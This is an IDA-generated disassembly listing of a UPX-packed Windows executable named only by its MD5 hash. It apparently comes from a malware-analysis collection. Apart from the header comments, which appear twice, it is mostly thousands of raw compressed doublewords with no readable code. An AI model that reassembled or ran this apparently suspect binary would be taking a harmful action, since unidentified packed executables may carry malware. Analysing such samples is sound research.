;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4B92B607C8F5CD4796C6F65E4DC8A2B3
; File Name : u:\work\4b92b607c8f5cd4796c6f65e4dc8a2b3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 1400h dup(0)
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0C272D637h, 0AB57AF50h, 69A9AF7Fh, 561004Fh, 0B4E8BCDBh
dd 5051B8D9h, 9CF11C7Ah, 0CDEF4509h, 7032FADh, 630F513Ah
dd 0BC15D98Bh, 525E80F1h, 2DD9A05Bh, 9BADAFA4h, 0DC45BDAFh
dd 0A8D36441h, 0AC15D9AFh, 5573D45Fh, 5825DB06h, 0E064D3Ah
dd 48E32DE9h, 15DD00C0h, 0F85A00C4h, 0FAE5940h, 0E4538EB7h
dd 426F9038h, 5C94666Ch, 0D5DD9963h, 0AFBDAE9Dh, 0DA2E8FE7h
dd 0D8E45D04h, 5070D046h, 0D3101011h, 0BE2C78A9h, 6149303Ah
dd 4CEBE9A7h, 4B038C8h, 6E10DA60h, 9CBBC958h, 0B0816AA6h
dd 569C6600h, 2F4E731Ch, 1EE6BFE0h, 593A714Ch, 61056738h
dd 0D4DD096Ah, 0AF3D1B15h, 6F702B5Bh, 80074A54h, 0AB15D8B0h
dd 0A29BAB40h, 4F118607h, 54B08070h, 0AAAA0759h, 64C38A8Ch
dd 5E793819h, 0B08840B1h, 0E62DEB66h, 3A64323Ah, 38C7440h
dd 3DCAD15Bh, 3614A6ABh, 50525D97h, 505EED38h, 0B136C4B4h
dd 4946B6E7h, 8D76718Eh, 25D9AC25h, 0BDA261B0h, 7EC83492h
dd 0DB7453BAh, 4940F465h, 0EFB1EFEAh, 0AF072698h, 4DDB0386h
dd 2C384DCCh, 0EB0DEABBh, 59029813h, 4883AF63h, 63DC253Ah
dd 2CFF3CD7h, 561038AFh, 0C8F01619h, 6327B452h, 63F8384Fh
dd 98550304h, 8E34B4B7h, 67270450h, 58609C8Fh, 77DC5F16h
dd 7680EDD0h, 65D55F61h, 95EBE7EBh, 5835D3B9h, 50578016h
dd 0C0A0EC6Ch, 915E89CAh, 0F5C4106h, 6C711600h, 0B6BB23h
dd 41A10C4Fh, 0E08C47E3h, 0BC5C9Bh, 283E5A4Eh, 0A1DF26A8h
dd 956F171h, 38D5D975h, 0BCEE5F43h, 0FE47E464h, 0F25490D3h
dd 70B84CC2h, 2B50A3ACh, 38383A52h, 90490514h, 1A47C1CEh
dd 63E0F052h, 0D75D7B23h, 2D535246h, 3E51F76Dh, 380D2613h
dd 38B626CFh, 0E79C6A07h, 3C9D982Bh, 0D4B04B0Ah, 7A203A26h
dd 23185E3Ch, 3084C6A4h, 0B15A0E98h, 34DE6223h, 50D42AC7h
dd 0E66FF278h, 18E20DCBh, 0E23C6C08h, 0BFC840ACh, 0B23CF998h
dd 5F8C5137h, 0EF5FC000h, 40B92E2Dh, 0FC38AA56h, 8378905Dh
dd 968D498Bh, 50785899h, 5C1E54B5h, 0CE9358F4h, 952A098Bh
dd 3475A97Dh, 8B4C8613h, 758E107Eh, 0E8F4C7B4h, 5D8E1411h
dd 0ECFC7F49h, 4B8E0014h, 66A5C340h, 0C4E74E33h, 0D171C75Dh
dd 0EFBEE62Eh, 0B82CFCA9h, 4674F5D0h, 38755650h, 0E0224C02h
dd 4CCDCF75h, 0C6A44226h, 0B3EA4B1h, 54BF4806h, 982C3A03h
dd 8A1B12Bh, 0EE0604E2h, 0DEBC2B99h, 0B104A21Ch, 0CFB974C0h
dd 36310684h, 2874C73Eh, 0D218BD9Fh, 0E252C646h, 0A4455CA8h
dd 0DC8F5236h, 0F42A41C9h, 0DB0EF858h, 0A30FA415h, 0BB03FA4h
dd 0D3369399h, 7064CBCh, 700A7C38h, 0EFE988E4h, 55E05D7Dh
dd 424838A8h, 0AC90D512h, 74B5A9Bh, 5E440A24h, 381B24A8h
dd 0A4E309B8h, 0A0DBDFA6h, 6D24A6D5h, 3A001DDDh, 3BFC1170h
dd 0AFA6929Fh, 0B85FAC05h, 0FC00B4E9h, 8C5FF678h, 0A05EC6CAh
dd 0A805B652h, 0C9FDE759h, 0B4DC50FDh, 12A4DF57h, 27D10E0Fh
dd 48D730ACh, 31C05DDBh, 50AC354Fh, 0AE899203h, 6C112FEBh
dd 38915307h, 18DB2528h, 28DB64h, 0F0A41DD9h, 65822A94h
dd 0C18B887Eh, 9325A003h, 0C30E45C7h, 1701BB51h, 0BD24BC42h
dd 8C8DE25Dh, 14871408h, 5E2543A2h, 5B721059h, 527D3DAFh
dd 1DDD73BBh, 480001A8h, 7E2B4F18h, 7A61C780h, 0D50D9054h
dd 0BD55258Bh, 3AA88690h, 3BBB0853h, 4960AA64h, 8DAB24FBh
dd 0A005093Eh, 1240EC2Dh, 0A06E1524h, 36BE3B01h, 30062EBh
dd 65AFE861h, 0AA2AEB34h, 0F1119DBEh, 7FFBE263h, 61070758h
dd 0AB2F48A0h, 24976BBCh, 0BB863655h, 0A68384Bh, 9B45838h
dd 0E9E71CBBh, 0BB55AC5Eh, 0E3545857h, 0A92859DBh, 0C25912D4h
dd 30030101h, 37D3615Fh, 31393C7Bh, 98C25DD9h, 0B9FC8D1Dh
dd 0E1FF3D5Ah, 978E243h, 0FEC9BD7Dh, 7424AF2Bh, 9CE63AA9h
dd 65E3D06Ch, 5CA187h, 5C519063h, 8048CED1h, 802B940h
dd 0EC70490Dh, 7F3FAE89h, 58740CA7h, 742CDB26h, 0D5A66344h
dd 36472EAFh, 0AFAEB074h, 0C94A3AEFh, 0D0A9A709h, 44D83192h
dd 0A76B164Eh, 74D0B92Ch, 3F2A506Bh, 0E2C8868Bh, 7E14B9E7h
dd 7FC0A0Fh, 8B535306h, 98368B49h, 42237F5Ch, 8CF58DE1h
dd 4900A0h, 0D3FA5006h, 0FC8D3C91h, 843F0627h, 3EDF191Dh
dd 0AA38DF3Bh, 97AFA05Ch, 0E631EB58h, 75CD033h, 0D30CD42Bh
dd 0EA41B0AEh, 3159332Fh, 6FD04725h, 46492460h, 268DEFD8h
dd 5724AC4Bh, 0DB5C10DBh, 254F60E8h, 96DB2F52h, 0FCBDF60Bh
dd 3F64C06Bh, 2C39359Ch, 77E636E5h, 0D05A5A25h, 0D5E50BA7h
dd 4A864Fh, 0E8572511h, 4451262Fh, 0CDEE6983h, 1585018h
dd 0CA7414DDh, 649D0C71h, 88A72B31h, 953904Bh, 2829120Fh
dd 8C99EA40h, 3A887040h, 1150BCD1h, 84B0E091h, 0A4670D68h
dd 0E37538BAh, 51A5041h, 48B03A6h, 39BB9938h, 1A5BBCCFh
dd 36882DBFh, 7541703Eh, 862A0B74h, 7D6B6C09h, 5C0901E0h
dd 0A8478AFDh, 9C89CD0Ah, 0CC65C5D0h, 4BE16DD2h, 8C980A63h
dd 17313039h, 0CB46569Dh, 9A0AF0AEh, 9C0D6B44h, 0F1299492h
dd 8FBE6450h, 63F1FF90h, 7BCE50E9h, 22916B97h, 9B91DB52h
dd 0EB26A727h, 8F1797Bh, 73975348h, 6D4324FCh, 7DE33D73h
dd 3A4122A1h, 0F4B8A8CDh, 9FAD94BBh, 561AC6B6h, 41770C97h
dd 3EB44EB4h, 45C434A2h, 535BD838h, 8B09D438h, 6CEC867Ch
dd 0B329036Ah, 38633A0h, 40B0F827h, 69F9EDDEh, 0AA92B312h
dd 7516015h, 0CE4D3D49h, 8086E6BDh, 0B331354h, 86EA4BEDh
dd 56A78B79h, 0D9D03838h, 4293D44Dh, 43778B3Dh, 9044BCB0h
dd 2671A2A9h, 626E691h, 522B0303h, 0D0416A51h, 70F3FC00h
dd 40A06F67h, 3724515Ah, 482DDCFh, 30F3BCA2h, 92334716h
dd 9ACBF1Bh, 0AC99AEF3h, 0FB060103h, 0B6A0B44h, 6DDB86Ah
dd 0D78F4B76h, 530E4ECBh, 0E24092DCh, 121C820Eh, 2006B51Dh
dd 0ADEEB85Ch, 0DD9A4CDh, 0AF5562BCh, 544FAF75h, 0DCF3936Ah
dd 0BC4BAD59h, 14B72413h, 99D49CDAh, 0C0008F24h, 67FD4B76h
dd 0DF7712BAh, 0B9C0FF20h, 5C343546h, 730FF024h, 0A8F6EF27h
dd 284F8869h, 3238E141h, 781B594Ah, 95DADCCh, 3B2BB09h
dd 13150F9Fh, 0C87C80E7h, 62051C0h, 2D633CCDh, 0E0EA9DE4h
dd 526E4186h, 0D2D6865Bh, 0D00F6029h, 8043194h, 0F3889C41h
dd 2CC4B0C0h, 963C60F0h, 4A34F35Eh, 2E76DC8h, 1E9F263Fh
dd 5779CC15h, 14455473h, 0C638EE46h, 0E3DE1A87h, 0E2FB434Dh
dd 195B0F4Dh, 5D3D2E97h, 6539C9C2h, 40C01438h, 92BE9B1Fh
dd 3A631083h, 2F41E0F1h, 41346AD0h, 0F1F9ADBBh, 0D93400BAh
dd 0DA55775h, 13F1B037h, 0AA6FAFA3h, 0ABF368DCh, 132A8F33h
dd 2C38AC6Ah, 145A370Bh, 24745497h, 0C049515Bh, 82343C51h
dd 0CC0496Ch, 4B45808h, 53706253h, 70181C00h, 14706253h
dd 5371B86Ch, 9606462h, 0D3B61D69h, 6924D20Fh, 0F60B7838h
dd 0EA705DE4h, 0BE1C343h, 5D384856h, 747E9240h, 5C5A201Ch
dd 0F96753B8h, 4F3BB177h, 51A438BCh, 3E197EF0h, 5849E737h
dd 5AA37F64h, 543C4BF8h, 7BB89969h, 70C67283h, 6C26462Ch
dd 400A2ED9h, 0D868A307h, 4B5DC443h, 0B7BB552Fh, 0F6AFBFD3h
dd 6A11655Fh, 0A0054B5Bh, 0E1C05D2Eh, 0D1525846h, 0F0130703h
dd 845DAF94h, 54DA4B26h, 245A6C6Eh, 675D6C54h, 8C697B0h
dd 165A6EADh, 9A06B4Ah, 0D333B522h, 922724A3h, 17A8FB18h
dd 40309E67h, 0E8955469h
dd 0FFEB1FD3h, 16539285h, 0EB5C7E9Fh, 0C903353Ch, 0D139C5Eh
dd 0C240AFD8h, 6E221BD3h, 2A75030h, 3DCE7646h, 9D213840h
dd 0F4402590h, 966BC499h, 9708D3A8h, 0CC246C71h, 3FDEED08h
dd 55FC34B6h, 0F2572448h, 64DBB3BBh, 6DD71B6Bh, 6AAC0511h
dd 0BB6A0D7Ah, 2A567007h, 0AA0587AFh, 0FE6EE122h, 579B11E8h
dd 9ADBCF0h, 659C91Fh, 0D090BBEBh, 777055F4h, 47BC971Ch
dd 5B665F82h, 0D1BCC053h, 7A42ACCDh, 385C03D2h, 90D54DDCh
dd 43ABC463h, 0B04C6BF6h, 29225FEDh, 88EAC0F6h, 59D8F2A8h
dd 0D82F1FD0h, 1BA0D751h, 15DA010Fh, 15D8705Bh, 888B62AFh
dd 2752AA6Ah, 0B67E8F4Fh, 0EA0D6861h, 5B0DD875h, 0B7284464h
dd 0EC5143BDh, 37F1E75Fh, 0A843AF09h, 0A7C9D977h, 28653AEh
dd 0D093AEC1h, 0ED22AFABh, 3CEA300Eh, 26326B09h, 2B7613D0h
dd 65DB90DEh, 9D083863h, 1FDD3C25h, 0E85AD16Eh, 0BD590DC4h
dd 5BD36648h, 257C2540h, 0F375E35Fh, 2B385C81h, 906DD990h
dd 62E5ECD3h, 8753AFD4h, 39ABD113h, 0F4FA3DA2h, 0D70FCF6Ch
dd 531CAF0Dh, 232B08E3h, 372DF28Bh, 7FDC530Fh, 2D07C006h
dd 81EC87ADh, 0AEAF54A3h, 0D82F6CCCh, 8B5E3BA7h, 0DBBFBB38h
dd 8CC96B74h, 0C3E06EFAh, 0F0F395CDh, 77FCE07h, 7CA6B4CCh
dd 9A82C44h, 45717843h, 0AF4A45EAh, 0BE25E331h, 65C188C8h
dd 0D577F17Ch, 0CE83EE83h, 28C96062h, 63FE20D4h, 32B0FC81h
dd 98D31E92h, 0ED2493DFh, 572F0030h, 6DBD27D8h, 5FEB6160h
dd 6751535Bh, 38E0A170h, 40EC0BF4h, 0C7EEF841h, 3C00FF51h
dd 5BD096FFh, 532F2B8Fh, 54FEA56h, 7BD6306h, 0B6887DD9h
dd 4019DF5Dh, 5CF560E9h, 5C93DBE1h, 9DA4AD4Fh, 8B650544h
dd 0A69C308Dh, 3A525Bh, 0F90BC868h, 0A7DAE87h, 50C68255h
dd 41594824h, 60302FF7h, 550EEBA7h, 42934449h, 533CDB23h
dd 653ED7B1h, 2475ADD1h, 4E82055Dh, 97E64E40h, 567401Eh
dd 48741C66h, 4AF58486h, 2E65BD67h, 47E01841h, 4E8B5EBDh
dd 0BF441B09h, 0BBCF55C3h, 74E716A2h, 39255DD3h, 63CD8DBBh
dd 385EC522h, 0F15B016Fh, 1BC1E6B1h, 45407CD0h, 6842405Ch
dd 3BE3EEDCh, 82645860h, 0B7EE501h, 648F7C7h, 48AC40h
dd 0D59664E2h, 6D066EDDh, 3C7A8924h, 0AACBF9CFh, 1E364448h
dd 81787048h, 53CD3DDBh, 55F0E28h, 0FA9E870Ah, 1D06DD19h
dd 4B7C067Eh, 39E99C0h, 77700506h, 86229866h, 25A018Ah
dd 1629745Ch, 0D5C4CC3h, 3851787Dh, 4D554E7Ch, 0BDB81ECFh
dd 5F8B8E7Fh, 6CE2C4DEh, 1E660C4Eh, 4E5DA729h, 463CA5A1h
dd 471C80E8h, 2A8EE61Bh, 88616538h, 0E12D7722h, 559740E3h
dd 7AD30070h, 0EBBB3444h, 0DD172DE2h, 3514E24h, 6FBF06ACh
dd 241F252Ah, 0B0E5AF4Ch, 0CB63B815h, 5FAFA25Bh, 0D058024Fh
dd 4C650900h, 26FC1666h, 0E8DDDEDh, 68E7EA28h, 7805F06h
dd 0C845397h, 0FD98B422h, 9084567Ch, 0CC8CF888h, 694CDE17h
dd 0D8B4C4B0h, 34BC20B8h, 73C19C49h, 68A418A0h, 846CB8E0h
dd 0EF5A2A64h, 0F334EE8Bh, 0A5203473h, 98E448DBh, 5F81B06h
dd 3950B900h, 5EE03C47h, 445B4DFBh, 654864DCh, 6FD3F045h
dd 61F25E3h, 52FB68D6h, 0EA655628h, 0FDD43017h, 3AD8A5C4h
dd 7738B533h, 63342620h, 0D348F1D4h, 0A8D71D64h, 90D353B0h
dd 591FA355h, 0CF4673Ch, 0D9409893h, 3E23606Dh, 0CA03826h
dd 445E765Ah, 0B1BC9437h, 3120B168h, 160B106Eh, 0E8702A63h
dd 0DB34FBE6h, 9669BE51h, 84ECC472h, 2A40A359h, 0F157B324h
dd 577FD6B9h, 0B8290ECCh, 0E90CAB50h, 2CA4076Dh, 304F95AFh
dd 73E75297h, 75A54456h, 0EBD402F0h, 0B01F0D5Bh, 40EFD63Ah
dd 0C6438F7h, 0D1B21101h, 67246F40h, 43AB46C3h, 0A8EB5ABEh
dd 8153C8C6h, 0BEA40302h, 88267F37h, 6D03EC03h, 73BBE168h
dd 5FE9FF4Bh, 75629E09h, 302148D8h, 0B2D8369Bh, 0C69D7635h
dd 9CEBFD2Dh, 0EB167CD4h, 98477E91h, 0A24570E9h, 33420EBBh
dd 1C371B77h, 6134B700h, 360BEB96h, 0AD6B2818h, 98F0FB7Ch
dd 5770DC0Bh, 45BB5C18h, 0B46DC11h, 93599D30h, 0E560E852h
dd 635CEE08h, 90644F32h, 2338E10Ch, 0EE6A433Ah, 8418991h
dd 5C38A107h, 6876570Eh, 12475199h, 0FF4C5416h, 4B605593h
dd 48283944h, 0EF4B2787h, 0A9DBBDA4h, 0DD05B105h, 65055E27h
dd 3A42DC83h, 5533A658h, 575C5F23h, 4297D370h, 0CADD4107h
dd 0C13893D5h, 0A5660C7Ch, 0C02DEBA8h, 10AE744Ch, 0B0DC210h
dd 4226AF3Ch, 96C4B72h, 5E2640B7h, 28444468h, 78EA536Ah
dd 6D8E8832h, 9D3BF348h, 0B87300D8h, 219A9566h, 0EE045D83h
dd 0E5E71050h, 265B0BDBh, 0E0DB0912h, 0F663AFCDh, 66E65911h
dd 3E58C3CDh, 73135800h, 0B08510D3h, 8E6538C7h, 0B81D7B72h
dd 0B11AE54Bh, 0A9AE2C2Dh, 0D158BDA6h, 3194CDA9h, 0A75E2327h
dd 0C82F3E2Ch, 3422CE6Bh, 5738D792h, 38C77D4Ah, 9EB57153h
dd 20C9E63Ah, 45689850h, 0F26E9FABh, 415466FEh, 4017DB76h
dd 7678506Dh, 2690F03Dh, 0A8354C27h, 42214975h, 0E8F4316Ah
dd 0B04417F6h, 40789A58h, 6AE3332Bh, 5E585C42h, 60CC7B38h
dd 0ED08D945h, 3073B196h, 0CF713E91h, 0D782E706h, 5750128Eh
dd 81BB5985h, 0FF68A54h, 408A7061h, 5D2D5858h, 917F3DC0h
dd 4B023B54h, 0EB57DB6Ah, 33B24A7Dh, 2EDD5664h, 665CA458h
dd 0D22D5EC3h, 0ADB01CA9h, 2DE6A4D1h, 8D5D364Ah, 76035718h
dd 3CDA9440h, 655491ADh, 0A7005817h, 40F046B8h, 664D707Fh
dd 5799D100h, 101A449Ch, 41CD9DDh, 4524A44Ah, 0D38E7E70h
dd 97584940h, 237AD116h, 0DBE7E5FEh, 0A7826306h, 5CD7549Fh
dd 7C12F95Ah, 8382D5E0h, 5B475EAFh, 900DBF8Ch, 132E505Ch
dd 6507ACEDh, 88DD3E4Eh, 7C24DC5Dh, 1491Ah, 73CB6B08h
dd 451CF533h, 0E5E0860Fh, 140BD922h, 1A6BF2A8h, 0BC07A806h
dd 1273ED2Ch, 36D332BBh, 8DCB7610h, 3561481Dh, 0EE792551h
dd 74EA12AEh, 7EAEB87Fh, 647AA954h, 4B25532Eh, 26EF67AFh
dd 42B80E5Bh, 5700808h, 51E07F60h, 56594A93h, 0A3802D70h
dd 0E6661770h, 0CAB475F5h, 0D3515088h, 0C7DE3C6Dh, 72B4B89Ch
dd 0A8B86B57h, 5A67576Ah, 4AFA5B00h, 0E230EC75h, 8051E7A0h
dd 0A489B323h, 0AC5F0625h, 93498980h, 287C778Bh, 0DF1355D3h
dd 5961107Fh, 660F5EC9h, 0E2931420h, 0FF49FABAh, 538B1206h
dd 43783C42h, 0B4F206B4h, 7FBD54C3h, 0D6DDB825h, 0D7FE5BABh
dd 0BAB977B6h, 0AC1DDB45h, 0DAEC1656h, 5A4506ADh, 623A862Ch
dd 0D3F61944h, 0E3A17843h, 0D540E6A8h, 0C61D371Fh, 2C286284h
dd 0ED5F8425h, 2C4DE968h, 4150F5ECh, 80633540h, 8040D7E3h
dd 19ECD94Ah, 38907A31h, 257DF51Ch, 90F8E5B0h, 87921183h
dd 0CDADDC20h, 0BB83584Fh, 0B8689ECDh, 3EBB312Bh, 3060EE33h
dd 56CD2D0Bh, 0F4F5363Ah, 393F125Fh, 0AD984434h, 0D33A405Ch
dd 0F4B08F56h, 4A93ED2Dh, 0E7BEEE5Fh, 3F3C1631h, 799D740h
dd 0A43F036Bh, 686912E7h, 9917B4Ah, 0A9E99353h, 0C06914DAh
dd 0BB5602BDh, 98984F73h, 59BA8813h, 3053BB98h, 103FBF58h
dd 0FE9344FBh, 0D450DA68h, 5BE7DE1Bh, 31DB1A5Fh, 9888DA03h
dd 86FD8E6h, 842A0AE4h, 0D8E34C75h, 0EDEE0957h, 1E17FB2Dh
dd 5B2C0931h, 562F2A55h, 0BED3A3DAh, 0B44BCE31h, 5F115A8Bh
dd 161B110Ah, 7DE58578h, 19320B1Fh, 0E47807D0h, 2A5E4858h
dd 25A8C212h, 0B365943Dh
dd 440E427Ch, 9F3B773Ah, 0DDCF4C59h, 4E5D14F8h, 28C59F48h
dd 83920E08h, 1549474Dh, 6ED1336Bh, 6509717Ch, 0CACC38D5h
dd 0F8664CF0h, 2093886Bh, 0C165613h, 5BE45960h, 2B1692DDh
dd 17DB3634h, 5C152E01h, 0E4373B26h, 3A512857h, 360C1AB3h
dd 72FFED4Dh, 28443285h, 0B4C61DE1h, 73AC63CAh, 26FB4D35h
dd 818D8FCBh, 0DB4CC4D4h, 4C707C1Eh, 0B9EDB51h, 465D7A70h
dd 0FE3BF61Bh, 0EC7D1259h, 9E1EB43Bh, 7854C041h, 0B0302438h
dd 0BD6C5670h, 639DD085h, 3B4CBAEAh, 0F0894C48h, 956FE958h
dd 74772Eh, 0E4AF2237h, 61331C74h, 6C8CCB34h, 66383870h
dd 0FDFC735Ch, 4361AFFCh, 0E73B09FCh, 6C50B798h, 100274D0h
dd 2381C7E1h, 6009083Dh, 467E3B4Dh, 28249Ch, 0D0DB9C56h
dd 4C3C2B4h, 8CC74478h, 0F24A76Eh, 7B9D5D7h, 9E70414Fh
dd 3E30F531h, 88400E4Dh, 505D2DC5h, 70F0730h, 0D90F680Eh
dd 0F8D18A46h, 0CA9135A0h, 0A03C72C0h, 0F2D4EED9h, 15273CE5h
dd 522C2ED9h, 746D2420h, 0C22C2E79h, 926894D1h, 6B58115Ch
dd 0DCD1170Ch, 89DBB0D9h, 7E3D0D4Ch, 0F031085Dh, 0E5542840h
dd 7439E118h, 2E33223Eh, 0CC8A13A8h, 0B0255307h, 685AF9D2h
dd 15FCC520h, 30D03476h, 12706A20h, 9F4699F0h, 8B625823h
dd 4C7CB553h, 98847658h, 723B7C31h, 5C1219C8h, 0EDBAE08Eh
dd 5F850370h, 428E4054h, 0DB7377h, 476000B2h, 7561497Ch
dd 296C436Ch, 787A8203h, 0E5A891E1h, 0C438A435h, 12AE874Fh
dd 54A82643h, 79BB533Ah, 0D0544348h, 0AD42721Eh, 96D3733Ah
dd 0BB6F8560h, 0FE40FCC9h, 1C8121AAh, 8AF44923h, 0B0B83E97h
dd 0EC7CA257h, 6158B019h, 5BC0F4E4h, 4444572Bh, 5FA5E48Dh
dd 55BCC0C2h, 6A94E893h, 189299E5h, 4094C490h, 0A8468095h
dd 0D9A16213h, 0BCA3A035h, 7FE81FE1h, 0ACB8D87Dh, 0B4D5970Ch
dd 57D9FD16h, 434270ECh, 941CAB0h, 311D332h, 5C42B464h
dd 34B70D56h, 0F2BD7DC9h, 2424482Dh, 0AC0DD913h, 0EE8F581Dh
dd 7B58A88Dh, 30993900h, 916B19BAh, 196A4A26h, 71B2CA81h
dd 0ABA41D2Fh, 817F41Fh, 241685D7h, 0D81BC502h, 14D83BC4h
dd 79662EA6h, 775931AEh, 25936B4Eh, 95F2F8FEh, 0F166E31Dh
dd 72117C7Fh, 0A420DB73h, 20417C70h, 62A2E854h, 9618019Bh
dd 2249DFB7h, 3AD65618h, 1FE4C8A4h, 0A75C3593h, 88EF528Bh
dd 0D1885356h, 914E5EABh, 0BE49D838h, 0E76B4511h, 0BC67DCE0h
dd 2040D510h, 5BD9EF4Fh, 2784E949h, 4868D858h, 0D24C6869h
dd 0D7E75FECh, 0AC41DEBh, 538B01D6h, 0CE744C8Dh, 0EB8CB65Ch
dd 8DBA43F6h, 4546A40Dh, 98A1F044h, 8CB4880Eh, 1054DD67h
dd 208CCA4Ah, 6B7BC0DEh, 41784443h, 0EF49DB0Ch, 509657D6h
dd 0A76D1073h, 0CF351EBh, 0FC045995h, 13329424h, 0FC40D96Ch
dd 4D858B4Bh, 52B8C7CCh, 0F44DD974h, 92628A7Bh, 0FC88B91Ah
dd 56510990h, 690E46E4h, 0E4B06191h, 412431CFh, 0A9575B24h
dd 9C684DCAh, 985A8730h, 4DD85CDDh, 600B176Bh, 384ACD4Dh
dd 0B7B9D1F8h, 38B88D2Eh, 731657FCh, 0CAD4FF3Dh, 5DA13094h
dd 0CFE005A2h, 0D7BA3D24h, 0D3C45725h, 0AA265592h, 93B2DFCh
dd 5B3809AAh, 0AF09774Ah, 16394465h, 0FCFE9A0h, 0BF43EDE2h
dd 5A759CE8h, 0B71B82Dh, 0BAAFD317h, 58A1C332h, 6263922Ch
dd 43361808h, 65E65E90h, 1A137C3h, 0D402C564h, 43FE3FDDh
dd 0BBFF221Ch, 650B7B5Eh, 0A737F10Fh, 0D35A5CBBh, 0BBE5506Dh
dd 84ADD790h, 0A9D86449h, 2C24248Bh, 67BED43Bh, 881C4B23h
dd 4442FD70h, 71882C50h, 1B894454h, 0D290EA57h, 6E41E8F5h
dd 0E93A40BBh, 30EC50E6h, 92D14740h, 0C1027428h, 1E915697h
dd 8864B871h, 0F783D4C3h, 2F4762B1h, 82395A19h, 9D64CCC2h
dd 745D34DAh, 9D5FE840h, 38CB7298h, 228E080h, 4013CADh
dd 0CF8E6B88h, 65769576h, 0A08A8ADCh, 0D2A0692Ah, 47AC4330h
dd 0A25F2854h, 56A0286Ch, 5F55D4DDh, 113755CDh, 6B094CEBh
dd 0E3060387h, 53523D86h, 2BAC1C44h, 0D4502D9Ah, 33EC270h
dd 947865C0h, 966B0036h, 50BE9CA3h, 0ACB31B76h, 50EF01D1h
dd 53304184h, 88A9079Ah, 0E5188009h, 0F1B64A20h, 0D3FC3608h
dd 6A4A4DEh, 1C630380h, 34E03F02h, 0CC55FA6Ch, 0D8B4CA8Ah
dd 0DE7F0380h, 734E56E2h, 529C654Bh, 4F7BFD07h, 0D9430C5Fh
dd 0A7A541B4h, 0E13B2F98h, 0CD93F6Bh, 167B9A8Ch, 77906D20h
dd 0AC1C75C4h, 57265059h, 1A19F6D3h, 5DA2B4D3h, 5B0CE37Ch
dd 167B281Eh, 4753B824h, 1A3A0C98h, 2051D00Fh, 6E65476h
dd 0C69644Fh, 0D97DF928h, 846ECF28h, 7C384612h, 15D6974Bh
dd 4C1932E5h, 64F576DAh, 0AB3D5B6Eh, 7260E100h, 93AB1CA6h
dd 66B77DB1h, 5A6439F2h, 5F76DE5Fh, 0C0E786B8h, 93604031h
dd 30032C5Ch, 838647Bh, 7921DDA8h, 93EC3D5Ch, 7C77A2EAh
dd 4ECD0A6Dh, 0A4DF409Fh, 0D4C4659Fh, 0A1BB074h, 0ABEB9125h
dd 0FDD684Dh, 57966C51h, 0AF326F2Ch, 0E950221Bh, 8D519B10h
dd 3C448751h, 0FD6F883Fh, 0CECD8C00h, 78CF87DDh, 4D107E9Dh
dd 20113053h, 49B6114Fh, 47EB1E58h, 50AFB7D7h, 5CD9689Eh
dd 0CEBB91D5h, 7E15587Dh, 0C217E7h, 0CB65DD9Fh, 0D4BDB8F5h
dd 473550h, 0D4BC8E96h, 44511AC2h, 27833081h, 60F6E99Eh
dd 81603D40h, 5015965Fh, 0EB3BEBCEh, 0ECD0992Ch, 2E3570F1h
dd 56987A19h, 0F6B98FA1h, 642431A8h, 1840ADD1h, 0B01D3F5Fh
dd 70697C23h, 0DE2C1697h, 3CB126A7h, 6D9A5A0h, 8798BB28h
dd 690C5DBBh, 90BCEB9h, 3C74A358h, 0BF582264h, 705CA97Dh
dd 0B0066785h, 9D0D8680h, 5B835F7Fh, 0D8BA0013h, 315457ECh
dd 915F78A7h, 40C87F14h, 0EBB61A99h, 0C44106EDh, 2D0C4731h
dd 9C3764D1h, 28484A32h, 0E0B4CC32h, 695D5C3Fh, 4830D300h
dd 577CC7D1h, 90952436h, 804EF528h, 60838B05h, 56EEDDCAh
dd 0C15B58A7h, 0FFD9ED9Dh, 6475AF9Ch, 2F605545h, 7CCA9652h
dd 4701509Ch, 58741CDDh, 0A78FE1ADh, 0B9D14422h, 0D5547D5Bh
dd 0BC234751h, 94DB987Bh, 0EC1B068Dh, 0DBB1DB5Ch, 9321103Ah
dd 73734C17h, 55487333h, 0CF585C44h, 54737373h, 0D440AC50h
dd 2CA86A40h, 402C272Eh, 0B8E84028h, 3EABB9EBh, 5BDE3B06h
dd 804D5CBCh, 466B10E8h, 77BFEAB9h, 0C355709Ch, 4358B749h
dd 9D485751h, 7D55852h, 0A7995B57h, 7F7B50C6h, 0EE1A5060h
dd 1EB0B2B7h, 11304F07h, 7896708h, 5050CE80h, 5413AFABh
dd 243808BBh, 7F6A2024h, 6762617Fh, 0AF51607Eh, 61EFADC1h
dd 6060686Ah, 357E357Fh, 508F3528h, 392A3F1Dh, 3D313C3Ch
dd 7F8BAFAFh, 0D8F7764h, 0E9369963h, 25DD51A1h, 0DAAEDB55h
dd 57C96C56h, 0AFDA8F16h, 607C56EFh, 0D8C96416h, 0BDB21757h
dd 8AB85ABBh, 35327EAAh, 0AF3FAF37h, 0C3217EABh, 425199C9h
dd 0ADC1EDADh, 22915746h, 0AD12FA38h, 40ADFA36h, 0ABFD88EAh
dd 0F94C44A7h, 0A3994AC8h, 0D658A1C8h, 40952152h, 0AF89ADD7h
dd 679B0FC0h, 4CC609C2h, 0B4446A28h, 5A2D2107h, 0A68F2D6Ah
